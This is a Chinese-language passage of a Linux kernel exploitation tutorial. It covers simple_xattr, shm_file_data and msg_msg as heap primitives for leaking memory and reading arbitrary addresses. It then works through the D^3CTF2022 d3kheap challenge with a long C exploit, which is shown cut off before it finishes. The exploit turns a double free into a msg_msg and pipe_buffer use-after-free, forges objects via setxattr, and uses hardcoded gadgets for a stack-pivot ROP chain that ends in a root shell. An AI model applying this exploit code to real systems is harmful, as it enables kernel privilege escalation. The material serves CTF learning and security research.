该结构常用于存储 in-memory filesystems (例如 tmpfs)的扩展属性(xattrs - extended attribute),每个文件的 simple_xattrlist_head 链表存起来。分配函数是 simple_xattr_alloc(),用户可控 simple_xattr->value,分配大小是 kmalloc-32 到很大。

1
2
3
4
5
6
7
8
9
10
struct simple_xattr {
struct list_head list;
char *name;
size_t size;
char value[];
};

struct list_head {
struct list_head *next, *prev;
};

缺点:simple_xattr 不能修改,当对它进行编辑时,会把旧的 simple_xattr 从链表unlink ,然后分配新的 simple_xattr 并链接上去。所以通过伪造 sizenext 指针,无法构造越界写或任意地址写。还有个问题就是非特权用户无法设置 simple_xattr,但是只要系统支持 user namespace 即可。

shm_file_data 与共享内存相关

进程间通信(Inter-Process Communication,IPC)即不同进程间的数据传递问题,在 Linux 当中有一种 IPC 技术名为共享内存,在用户态中我们可以通过 shmgetshmatshmctlshmdt 这四个系统调用操纵共享内存。

shm_file_data(kmalloc-32|GFP_KERNEL)

该结构体定义于 /ipc/shm.c 中,如下:

1
2
3
4
5
6
struct shm_file_data {
int id;
struct ipc_namespace *ns;
struct file *file;
const struct vm_operations_struct *vm_ops;
};

分配:shmat 系统调用

我们知道使用 shmget 系统调用可以获得一个共享内存对象,随后要使用 shmat 系统调用将共享内存对象映射到进程的地址空间,在该系统调用中调用了 do_shmat() 函数,注意到如下逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
long do_shmat(int shmid, char __user *shmaddr, int shmflg,
ulong *raddr, unsigned long shmlba)
{
//...

struct shm_file_data *sfd;

//...

sfd = kzalloc(sizeof(*sfd), GFP_KERNEL);
//...
file->private_data = sfd;

即在调用 shmat 系统调用时会创建一个 shm_file_data 结构体,最后会存放在共享内存对象文件的 private_data 域中。

使用方法如下:

1
2
3
4
5
6
7
8
9
10
int shm_id = shmget(114514, 0x1000, SHM_R | SHM_W | IPC_CREAT);
if (shm_id < 0) {
puts("[-] shmget failed.");
exit(-1);
}
char *shm_addr = shmat(shm_id, NULL, 0);
if (shm_addr < 0) {
puts("[-] shmat failed.");
exit(-1);
}

释放:shmdt 系统调用

我们知道使用 shmdt 系统调用用以断开与共享内存对象的连接,观察其源码,发现其会调用 ksys_shmdt() 函数,注意到如下调用链:

1
2
3
4
5
SYS_shmdt()
ksys_shmdt()
do_munmap()
remove_vma_list()
remove_vma()

其中有着这样一条代码:

1
2
3
4
5
6
7
8
static struct vm_area_struct *remove_vma(struct vm_area_struct *vma)
{
struct vm_area_struct *next = vma->vm_next;

might_sleep();
if (vma->vm_ops && vma->vm_ops->close)
vma->vm_ops->close(vma);
//...

在这里调用了该 vmavm_ops 对应的 close 函数,我们将目光重新放回共享内存对应的 vma 的初始化的流程当中,在 shmat() 中注意到如下逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
long do_shmat(int shmid, char __user *shmaddr, int shmflg,
ulong *raddr, unsigned long shmlba)
{
//...
sfd = kzalloc(sizeof(*sfd), GFP_KERNEL);
if (!sfd) {
fput(base);
goto out_nattch;
}

file = alloc_file_clone(base, f_flags,
is_file_hugepages(base) ?
&shm_file_operations_huge :
&shm_file_operations);

在这里调用了 alloc_file_clone() 函数,其会调用 alloc_file() 函数将第三个参数赋值给新的 file 结构体的 f_op 域,在这里是 shm_file_operationsshm_file_operations_huge,定义于 /ipc/shm.c 中,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
static const struct file_operations shm_file_operations = {
.mmap = shm_mmap,
.fsync = shm_fsync,
.release = shm_release,
.get_unmapped_area = shm_get_unmapped_area,
.llseek = noop_llseek,
.fallocate = shm_fallocate,
};

/*
* shm_file_operations_huge is now identical to shm_file_operations,
* but we keep it distinct for the sake of is_file_shm_hugepages().
*/
static const struct file_operations shm_file_operations_huge = {
.mmap = shm_mmap,
.fsync = shm_fsync,
.release = shm_release,
.get_unmapped_area = shm_get_unmapped_area,
.llseek = noop_llseek,
.fallocate = shm_fallocate,
};

在这里对于关闭 shm 文件,对应的是 shm_release 函数,如下:

1
2
3
4
5
6
7
8
9
10
static int shm_release(struct inode *ino, struct file *file)
{
struct shm_file_data *sfd = shm_file_data(file);

put_ipc_ns(sfd->ns);
fput(sfd->file);
shm_file_data(file) = NULL;
kfree(sfd);
return 0;
}

即当我们进行 shmdt 系统调用时便可以释放 shm_file_data 结构体。

1
2
3
if (shmdt(shm_addr) < 0) {
puts("[-] shmdt failed.");
}

数据泄露

  • 内核 .text 段地址

    shm_file_datans 域 和 vm_ops 域皆指向内核的 .text 段中,若是我们能够泄露这两个指针便能获取到内核 .text 段基址。

    • ns 字段通常指向 init_ipc_ns
    • vm_ops 字段通常指向 shmem_vm_ops
  • 内核线性映射区( direct mapping area)

    shm_file_data 的 file 域为一个 file 结构体,位于线性映射区中,若能泄露 file 域则同样能泄漏出内核的“堆上地址” 。

system V 消息队列:内核中的“菜单堆”

在 Linux kernel 中有着一组 system V 消息队列相关的系统调用:

  • msgget:创建一个消息队列
  • msgsnd:向指定消息队列发送消息
  • msgrcv:从指定消息队列接接收消息

当我们创建一个消息队列时,在内核空间中会创建一个 msg_queue 结构体,其表示一个消息队列:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/* one msq_queue structure for each present queue on the system */
struct msg_queue {
struct kern_ipc_perm q_perm;
time64_t q_stime; /* last msgsnd time */
time64_t q_rtime; /* last msgrcv time */
time64_t q_ctime; /* last change time */
unsigned long q_cbytes; /* current number of bytes on queue */
unsigned long q_qnum; /* number of messages in queue */
unsigned long q_qbytes; /* max number of bytes on queue */
struct pid *q_lspid; /* pid of last msgsnd */
struct pid *q_lrpid; /* last receive pid */

struct list_head q_messages;
struct list_head q_receivers;
struct list_head q_senders;
} __randomize_layout;

msg_msg & msg_msgseg:近乎任意大小的对象分配

当我们调用 msgsnd 系统调用在指定消息队列上发送一条指定大小的 message 时,在内核空间中会创建这样一个结构体:

1
2
3
4
5
6
7
8
9
/* one msg_msg structure for each message */
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
struct msg_msgseg *next;
void *security;
/* the actual message follows immediately */
};

msg_queuemsg_msg 构成双向链表。

虽然 msg_queue 的大小基本上是固定的,但是 msg_msg 作为承载消息的本体其大小是可以随着消息大小的改变而进行变动的,去除掉 msg_msg 结构体本身的 0x30 字节的部分(或许可以称之为 header)剩余的部分都用来存放用户数据,因此内核分配的 object 的大小是跟随着我们发送的 message 的大小进行变动的

而当我们单次发送 大于【一个页面大小 - header size】 大小的消息时,内核会额外补充添加 msg_msgseg 结构体,其与 msg_msg 之间形成如下单向链表结构:

同样地,单个 msg_msgseg 的大小最大为一个页面大小,因此超出这个范围的消息内核会额外补充上更多的 msg_msgseg 结构体。

分配(GFP_KERNEL_ACCOUNT):msgsnd 系统调用

当我们在消息队列上发送一个 message 时,do_msgsnd 首先会调用 load_msg 将该 message 拷贝到内核中。注意这里对 msgszmtype 的检查。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static long do_msgsnd(int msqid, long mtype, void __user *mtext,
size_t msgsz, int msgflg)
{
struct msg_queue *msq;
struct msg_msg *msg;
int err;
struct ipc_namespace *ns;
DEFINE_WAKE_Q(wake_q);

ns = current->nsproxy->ipc_ns;

if (msgsz > ns->msg_ctlmax || (long) msgsz < 0 || msqid < 0)
return -EINVAL;
if (mtype < 1)
return -EINVAL;

msg = load_msg(mtext, msgsz);

//...

load_msg() 最终会调用到 alloc_msg() 分配所需的空间。

1
2
3
4
5
6
7
8
struct msg_msg *load_msg(const void __user *src, size_t len)
{
struct msg_msg *msg;
struct msg_msgseg *seg;
int err = -EFAULT;
size_t alen;

msg = alloc_msg(len);

alloc_msg 根据数据长度创建 msg_msg 以及 msg_msgseg 构成的单向链表。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
static struct msg_msg *alloc_msg(size_t len)
{
struct msg_msg *msg;
struct msg_msgseg **pseg;
size_t alen;

alen = min(len, DATALEN_MSG);
msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT);
if (msg == NULL)
return NULL;

msg->next = NULL;
msg->security = NULL;

len -= alen;
pseg = &msg->next;
while (len > 0) {
struct msg_msgseg *seg;

cond_resched();

alen = min(len, DATALEN_SEG);
seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);
if (seg == NULL)
goto out_err;
*pseg = seg;
seg->next = NULL;
pseg = &seg->next;
len -= alen;
}

return msg;

out_err:
free_msg(msg);
return NULL;
}

释放/读取:msgrcv

msgrcv 系统调用有如下调用链:

1
2
3
SYS_msgrcv()
ksys_msgrcv()
do_msgrcv()

其中 ksys_msgrcv 传入的是 do_msg_fill 函数指针。

1
2
3
4
5
long ksys_msgrcv(int msqid, struct msgbuf __user *msgp, size_t msgsz,
long msgtyp, int msgflg)
{
return do_msgrcv(msqid, msgp, msgsz, msgtyp, msgflg, do_msg_fill);
}

通过 msgrcv 系统调用我们可以从指定的消息队列中接收指定大小的消息,内核首先会调用 list_del() 将其从 msg_queue 的双向链表上 unlink,之后调用 msg_handlerdo_msg_fill 函数处理信息,最后再调用 free_msg() 释放 msg_msg 单向链表上的所有消息。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
//...
list_del(&msg->m_list);
//...
goto out_unlock0;
//...
out_unlock0:
ipc_unlock_object(&msq->q_perm);
wake_up_q(&wake_q);
out_unlock1:
rcu_read_unlock();
if (IS_ERR(msg)) {
free_copy(copy);
return PTR_ERR(msg);
}

bufsz = msg_handler(buf, msg, bufsz);
free_msg(msg);

return bufsz;
}

do_msg_fill 函数内容如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
static long do_msg_fill(void __user *dest, struct msg_msg *msg, size_t bufsz)
{
struct msgbuf __user *msgp = dest;
size_t msgsz;

if (put_user(msg->m_type, &msgp->mtype))
return -EFAULT;

msgsz = (bufsz > msg->m_ts) ? msg->m_ts : bufsz;
if (store_msg(msgp->mtext, msg, msgsz))
return -EFAULT;
return msgsz;
}

在该函数中最终调用 store_msg() 完成消息向用户空间的拷贝,拷贝循环的终止条件是单向链表末尾的 NULL 指针,拷贝数据的长度主要依赖的是 msg_msgm_ts 成员

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
int store_msg(void __user *dest, struct msg_msg *msg, size_t len)
{
size_t alen;
struct msg_msgseg *seg;

alen = min(len, DATALEN_MSG);
if (copy_to_user(dest, msg + 1, alen))
return -1;

for (seg = msg->next; seg != NULL; seg = seg->next) {
len -= alen;
dest = (char __user *)dest + alen;
alen = min(len, DATALEN_SEG);
if (copy_to_user(dest, seg + 1, alen))
return -1;
}
return 0;
}

free_msg 会遍历 msg_msgnext 依次释放。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
void free_msg(struct msg_msg *msg)
{
struct msg_msgseg *seg;

security_msg_msg_free(msg);

seg = msg->next;
kfree(msg);
while (seg != NULL) {
struct msg_msgseg *tmp = seg->next;

cond_resched();
kfree(seg);
seg = tmp;
}
}

读取但不释放(MSG_COPY):msgrcv

当我们在调用 msgrcv 接收消息时,相应的 msg_msg 链表便会被释放,但阅读源码我们会发现,当我们在调用 msgrcv 时若设置了 MSG_COPY 标志位,则内核会将 message 拷贝一份后再拷贝到用户空间,原双向链表中的 message 并不会被 unlink,从而我们便可以多次重复地读取同一个 msg_msg 链条中的数据。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
//...

if (msgflg & MSG_COPY) {
if ((msgflg & MSG_EXCEPT) || !(msgflg & IPC_NOWAIT))
return -EINVAL;
copy = prepare_copy(buf, min_t(size_t, bufsz, ns->msg_ctlmax)); // 创建一个 msg_msg 结构 copy 用来存放拷贝的数据
if (IS_ERR(copy))
return PTR_ERR(copy);
}
//...

for (;;) {
//...
msg = find_msg(msq, &msgtyp, mode); // 根据 msgtyp 找到要拷贝的 msg_msg
if (!IS_ERR(msg)) {
/*
* Found a suitable message.
* Unlink it from the queue.
*/
if ((bufsz < msg->m_ts) && !(msgflg & MSG_NOERROR)) {
msg = ERR_PTR(-E2BIG);
goto out_unlock0;
}
/*
* If we are copying, then do not unlink message and do
* not update queue parameters.
*/
if (msgflg & MSG_COPY) {
msg = copy_msg(msg, copy); // 将 msg 数据拷贝到 copy 中
goto out_unlock0;
}

list_del(&msg->m_list);

这里需要注意的是当我们使用 MSG_COPY 标志位进行数据泄露时,其寻找消息的逻辑并非像普通读取消息那样比对 msgtyp, 而是以 msgtyp 作为读取的消息序号(即 msgtyp == 0 表示读取第 0 条消息,以此类推)。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
static struct msg_msg *find_msg(struct msg_queue *msq, long *msgtyp, int mode)
{
struct msg_msg *msg, *found = NULL;
long count = 0;

list_for_each_entry(msg, &msq->q_messages, m_list) {
if (testmsg(msg, *msgtyp, mode) &&
!security_msg_queue_msgrcv(&msq->q_perm, msg, current,
*msgtyp, mode)) {
if (mode == SEARCH_LESSEQUAL && msg->m_type != 1) {
*msgtyp = msg->m_type - 1;
found = msg;
} else if (mode == SEARCH_NUMBER) {//MSG_COPY 对应分支
if (*msgtyp == count)
return msg;
} else
return msg;
count++;
}
}

return found ?: ERR_PTR(-EAGAIN);
}

static inline int convert_mode(long *msgtyp, int msgflg)
{
if (msgflg & MSG_COPY)
return SEARCH_NUMBER;
...
}

mode = convert_mode(&msgtyp, msgflg);
...
msg = find_msg(msq, &msgtyp, mode);

同样的,对于 MSG_COPY 而言,数据的拷贝使用的是 copy_msg() 函数,其会比对源消息的 m_ts 是否大于存储拷贝的消息的 m_ts ,若大于则拷贝失败,而后者则为我们传入 msgrcv()msgsz,因此若我们仅读取单条消息则需要保证两者相等

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
struct msg_msg *copy_msg(struct msg_msg *src, struct msg_msg *dst)
{
struct msg_msgseg *dst_pseg, *src_pseg;
size_t len = src->m_ts;
size_t alen;

if (src->m_ts > dst->m_ts)// 有个 size 检查
return ERR_PTR(-EINVAL);

alen = min(len, DATALEN_MSG);
memcpy(dst + 1, src + 1, alen);

for (dst_pseg = dst->next, src_pseg = src->next;
src_pseg != NULL;//以源 msg 链表尾为终止
dst_pseg = dst_pseg->next, src_pseg = src_pseg->next) {

len -= alen;
alen = min(len, DATALEN_SEG);
memcpy(dst_pseg + 1, src_pseg + 1, alen);
}

dst->m_type = src->m_type;
dst->m_ts = src->m_ts;

return dst;
}

数据泄露

  • 越界数据读取
    在拷贝数据时对长度的判断主要依靠的是 msg_msg->m_ts,我们不难想到的是:若是我们能够控制一个 msg_msg 的 header,将其 m_ts 成员改为一个较大的数,我们就能够越界读取出最多将近一张内存页大小的数据
  • 任意地址读
    对于大于一张内存页的数据而言内核会在 msg_msg 的基础上再补充加上 msg_msgseg 结构体,形成一个单向链表,我们不难想到的是:若是我们能够同时劫持 msg_msg->m_tsmsg_msg->next,我们便能够完成内核空间中的任意地址读
    但这个方法有一个缺陷,无论是 MSG_COPY 还是常规的接收消息,其拷贝消息的过程的判断主要依据还是单向链表的 next 指针,因此若我们需要完成对特定地址向后的一块区域的读取,我们需要保证该地址上的数据为 NULL 。
  • 基于堆地址泄露的堆上连续内存搜索
    虽然我们不能直接读取当前 msg_msg 的 header,但我们不难想到的是:我们可以通过喷射大量的 msg_msg,从而利用越界读来读取其他 msg_msg 的 header,通过其双向链表成员泄露出一个“堆”上地址。
    由于任意地址读要求伪造的 msg_segnext 为 NULL,因此我们不仅需要一个堆地址,还需要这个堆地址对应的 8 字节数据为 NULL 。由于 msg_msg 是双向链表,我们在越界读其他 msg_msg 的 header 并且这个 msg_msg 所在双向链表只有它一个msg_msg 时就可以根据链表指针找到该 msg_msg 对应的 msg_queue
    而由msg_queue 的结构可知,msg_msg 指向的是 msg_queueq_messages ,而 q_messages 往前 8 字节是 q_lrpid 在未使用 msgrcv 接收消息时为 NULL 。也就是说我们得到了一个堆上地址同时这个地址上的数据为 NULL 。
    在我们完成对“堆”上地址的泄露之后,我们可以在每一次读取时挑选已知数据为 NULL 的区域作为 next->next 以避免 kernel panic,以此获得连续的搜索内存的能力,不过这需要我们拥有足够次数的更改 msg_msg 的 header 的能力。

例题:D^3CTF2022 - d3kheap

附件下载链接

存在一次 0x400 大小 object 的 double free 。

方法1

转换成 msg_msg 结构体的 UAF,利用 setxattr 对其进行修改。实测 0x400 的 object 的 free list 偏移较大,不会对利用造成影响。

首先 setxattr 修改 msg_msg 越界读泄露 msg_queue 地址。

setxattr 再次修改 msg_msg 任意地址读 msg_queue 泄露 double free 的 msg_msg 地址用于之后伪造 pipe_bufferops 指针。

之后 setxattr 多次修改 msg_msg 任意地址读直至泄露内核地址。

之后将 msg_msg 结构体的 UAF 转换为 pipe_buffer 结构体的 UAF 然后劫持控制流+栈迁移执行 ROP 提权。由于有 double free 检测,因此需要先释放一个其他的 msg_msg 再释放被劫持的 msg_msg 。之后创建 pipe 劫持该 msg_msg 。利用 setxattr 修改 pipe_buffer 为下图所示后关闭 pipe 劫持程序执行流。

栈迁移有如下关键 gadget ,当调用 ops->release 函数时 rsi 寄存器指向 pipe_buffer 因此可以将栈迁移至 &pipe_buffer + 0x20 位置。在该位置构造提权 rop 完成提权。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
.text:FFFFFFFF812DBEDE push    rsi
.text:FFFFFFFF812DBEDF pop rsp
.text:FFFFFFFF812DBEE0 test edx, edx
.text:FFFFFFFF812DBEE2 jle loc_FFFFFFFF812DBF88
...
.text:FFFFFFFF812DBF88 ud2
.text:FFFFFFFF812DBF8A mov eax, 0FFFFFFEAh
.text:FFFFFFFF812DBF8F jmp short loc_FFFFFFFF812DBF2C
...
.text:FFFFFFFF812DBF2C pop rbx
.text:FFFFFFFF812DBF2D pop r12
.text:FFFFFFFF812DBF2F pop r13
.text:FFFFFFFF812DBF31 pop rbp
.text:FFFFFFFF812DBF32 retn
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sched.h>
#include <stdbool.h>
#include <sys/xattr.h>
#include<ctype.h>

void bind_core(int core) {
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

void qword_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("[*] %s:\n", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}

size_t user_cs, user_rflags, user_sp, user_ss;

void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("[*] status has been saved.");
}

void get_shell() { system("cat flag;/bin/sh"); }

struct list_head {
struct list_head *next, *prev;
};

/* one msg_msg structure for each message */
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
void *next; /* struct msg_msgseg *next; */
void *security; /* NULL without SELinux */
/* the actual message follows immediately */
};

struct msg_msgseg {
struct msg_msgseg *next;
/* the next part of the message follows immediately */
};

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

#define PAGE_SIZE 0x1000
#define DATALEN_MSG ((size_t)PAGE_SIZE-sizeof(struct msg_msg))
#define DATALEN_SEG ((size_t)PAGE_SIZE-sizeof(struct msg_msgseg))

int get_msg_queue(void) {
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

long read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
((struct msgbuf *) msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

long peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
return msgrcv(msqid, msgp, msgsz, msgtyp, MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

void build_msg(void *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security) {
((struct msg_msg *) msg)->m_list.next = (void *) m_list_next;
((struct msg_msg *) msg)->m_list.prev = (void *) m_list_prev;
((struct msg_msg *) msg)->m_type = (long) m_type;
((struct msg_msg *) msg)->m_ts = m_ts;
((struct msg_msg *) msg)->next = (void *) next;
((struct msg_msg *) msg)->security = (void *) security;
}

struct {
long mtype;
char mtext[DATALEN_MSG + DATALEN_SEG];
} oob_msgbuf;

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

bool is_kernel_text_addr(size_t addr) {
return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFFFEFFFFFF;
// return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFF9FFFFFFF;
}

bool is_dir_mapping_addr(size_t addr) {
return addr >= 0xFFFF888000000000 && addr <= 0xFFFFc87FFFFFFFFF;
}

#define INVALID_KERNEL_OFFSET 0x1145141919810

const size_t kernel_addr[] = {
0xffffffff812b76e9,
0xffffffff82101980,
0xffffffff82e77440,
0xffffffff82411de7,
0xffffffff817894f0,
0xffffffff833fac90,
0xffffffff823c3785,
0xffffffff810b2990,
0xffffffff82e49900,
0xffffffff8111b8b4,
0xffffffff8204ac40,
0xffffffff8155c320,
0xffffffff810d6ee0,
0xffffffff810e55e0,
0xffffffff82f05e80,
0xffffffff82ec0260,
0xffffffff8157a030,
0xffffffff81578190,
0xffffffff81531b30,
0xffffffff81531b00,
0xffffffff8153b150,
0xffffffff8153b2e0,
0xffffffff8149e380
};

size_t kernel_offset_query(size_t kernel_text_leak) {
if (!is_kernel_text_addr(kernel_text_leak)) {
return INVALID_KERNEL_OFFSET;
}
for (int i = 0; i < sizeof(kernel_addr) / 8; i++) {
if (!((kernel_text_leak ^ kernel_addr[i]) & 0xFFF) && !((kernel_text_leak - kernel_addr[i]) & 0xFFFFF)) {
return kernel_text_leak - kernel_addr[i];
}
}
printf("[-] unknown kernel addr: %p\n", kernel_text_leak);
return INVALID_KERNEL_OFFSET;
}

size_t search_kernel_offset(void *buf, int len) {
size_t *search_buf = buf;
for (int i = 0; i < len / 8; i++) {
size_t kernel_offset = kernel_offset_query(search_buf[i]);
if (kernel_offset != INVALID_KERNEL_OFFSET) {
printf("[+] kernel leak addr: %p\n", search_buf[i]);
printf("[+] kernel offset: %p\n", kernel_offset);
return kernel_offset;
}
}
return INVALID_KERNEL_OFFSET;
}

int d3heap_fd;

void chunk_add() {
ioctl(d3heap_fd, 0x1234);
}

void chunk_delete() {
ioctl(d3heap_fd, 0xdead);
}

#define HEAP_SIZE 1024
#define MSG_QUE_NUM 5

struct {
long mtype;
char mtext[HEAP_SIZE - sizeof(struct msg_msg)];
} msgbuf;

char fake_msg[HEAP_SIZE];

size_t init_cred = 0xffffffff82c6d580;
size_t commit_creds = 0xffffffff810d25c0;
size_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81c00ff0;
size_t pop_rdi_ret = 0xffffffff810938f0;
size_t push_rsi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_rbp_ret = 0xffffffff812dbede;

int main() {
bind_core(0);
save_status();
d3heap_fd = open("/dev/d3kheap", O_RDONLY);

chunk_add();
chunk_delete();
int msqid[MSG_QUE_NUM];
for (int i = 0; i < MSG_QUE_NUM; i++) {
if ((msqid[i] = get_msg_queue()) < 0) {
puts("[-] mdgget failed.");
exit(-1);
}
memset(msgbuf.mtext, 'A' + (i % 26), sizeof(msgbuf.mtext));
msgbuf.mtype = i + 1;
if (write_msg(msqid[i], &msgbuf, sizeof(msgbuf.mtext), i + 1) < 0) {
puts("[-] msgnd failed.");
exit(-1);
}
}

chunk_delete();
memset(fake_msg, '#', sizeof(fake_msg));
build_msg(fake_msg, 0, 0, 0, DATALEN_MSG, 0, 0);
setxattr("/flag", "sky123", fake_msg, HEAP_SIZE, 0);
if (peek_msg(msqid[0], &oob_msgbuf, DATALEN_MSG, 0) < 0) {
puts("[-] msgrcv failed.");
return -1;
}
printf("[*] msgbuf->mtype: %ld\n", oob_msgbuf.mtype);
qword_dump("leak msg_queue addr from msg_msg", oob_msgbuf.mtext, DATALEN_MSG);
size_t kernel_offset = INVALID_KERNEL_OFFSET;
size_t msg_queue_addr = 0;
size_t msg_msg_offset;
int msg_queue_index = -1;
for (int i = sizeof(msgbuf.mtext); i + HEAP_SIZE < DATALEN_MSG; i += HEAP_SIZE) {
struct msg_msg *msg_msg = (struct msg_msg *) &oob_msgbuf.mtext[i];
if (is_dir_mapping_addr((size_t) msg_msg->m_list.next)
&& msg_msg->m_list.next == msg_msg->m_list.prev
&& msg_msg->m_ts == sizeof(msgbuf.mtext)
&& msg_msg->m_type >= 2 && msg_msg->m_type <= MSG_QUE_NUM) {
msg_queue_addr = (size_t) msg_msg->m_list.next;
msg_msg_offset = i + sizeof(struct msg_msg);
msg_queue_index = (int) msg_msg->m_type - 1;
break;
}
}
kernel_offset = search_kernel_offset(&oob_msgbuf.mtext[sizeof(msgbuf.mtext)], DATALEN_MSG - sizeof(msgbuf.mtext));
if (msg_queue_addr) {
printf("[+] msg_queue addr: %p\n", msg_queue_addr);
printf("[*] msg_queue index: %d\n", msg_queue_index);
} else {
puts("[-] failed to leak heap.");
exit(-1);
}

build_msg(fake_msg, 0, 0, 0, DATALEN_MSG + DATALEN_SEG, msg_queue_addr - 8, 0);
setxattr("/flag", "sky123", fake_msg, HEAP_SIZE, 0);
if (peek_msg(msqid[0], &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0) < 0) {
puts("[-] msgrcv failed.");
return -1;
}
printf("[*] msgbuf->mtype: %ld\n", oob_msgbuf.mtype);
qword_dump("leak msg_msg addr from msg_queue", &oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);
if (kernel_offset == INVALID_KERNEL_OFFSET) {
kernel_offset = search_kernel_offset(&oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);
}
size_t msg_msg_addr = *(size_t *) &oob_msgbuf.mtext[DATALEN_MSG];
printf("[+] msg_msg addr: %p\n", msg_msg_addr);

